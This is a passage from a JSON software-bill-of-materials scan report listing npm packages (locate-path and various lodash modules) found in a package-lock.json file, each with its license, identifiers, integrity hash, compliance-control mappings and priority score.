"version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: locate-path 5.0.0", "title": "locate-path 5.0.0", "description": "Package discovered: locate-path 5.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6b383b17df8c845", "name": "locate-path", "version": "5.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/locate-path@5.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", "dependencies": { "p-locate": "^4.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4752919bcee27237", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash 4.18.1", "title": "lodash 4.18.1", "description": "Package discovered: lodash 4.18.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ac9c211256bf6980", "name": "lodash", "version": "4.18.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/lodash@4.18.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "89713df98a2beb75", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.camelcase 4.3.0", "title": "lodash.camelcase 4.3.0", "description": "Package discovered: lodash.camelcase 4.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a5b985768ef9b9f6", "name": "lodash.camelcase", "version": "4.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.camelcase@4.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4b1d67018d50050d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.clonedeep 4.5.0", "title": "lodash.clonedeep 4.5.0", "description": "Package discovered: lodash.clonedeep 4.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1fdd3c59e36d5b0f", "name": "lodash.clonedeep", "version": "4.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.clonedeep@4.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", "integrity": "sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6ee3a377a52860b5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.defaults 4.2.0", "title": "lodash.defaults 4.2.0", "description": "Package discovered: lodash.defaults 4.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "59a8c664dfef6c46", "name": "lodash.defaults", "version": "4.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.defaults@4.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz", "integrity": "sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a3b4683fdc629aef", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.includes 4.3.0", "title": "lodash.includes 4.3.0", "description": "Package discovered: lodash.includes 4.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "aa93a44741b08e66", "name": "lodash.includes", "version": "4.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.includes@4.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz", "integrity": "sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c512306c360b6fda", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isarguments 3.1.0", "title": "lodash.isarguments 3.1.0", "description": "Package discovered: lodash.isarguments 3.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c84bded77fb6b828", "name": "lodash.isarguments", "version": "3.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isarguments@3.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz", "integrity": "sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f0317f2d62f56421", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isboolean 3.0.3", "title": "lodash.isboolean 3.0.3", "description": "Package discovered: lodash.isboolean 3.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "df154b64f7d4588a", "name": "lodash.isboolean", "version": "3.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isboolean@3.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", "integrity": "sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2ae1d391a80c5a72", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isinteger 4.0.4", "title": "lodash.isinteger 4.0.4", "description": "Package discovered: lodash.isinteger 4.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e92c8ae8d8c83e78", "name": "lodash.isinteger", "version": "4.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isinteger@4.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz", "integrity": "sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0e12d10e43707e74", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isnumber 3.0.3", "title": "lodash.isnumber 3.0.3", "description": "Package discovered: lodash.isnumber 3.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "32689628126e866e", "name": "lodash.isnumber", "version": "3.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isnumber@3.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz", "integrity": "sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f1231b7e60dd673c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isplainobject 4.0.6", "title": "lodash.isplainobject 4.0.6", "description": "Package discovered: lodash.isplainobject 4.0.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a6b14f73240e0d01", "name": "lodash.isplainobject", "version": "4.0.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": 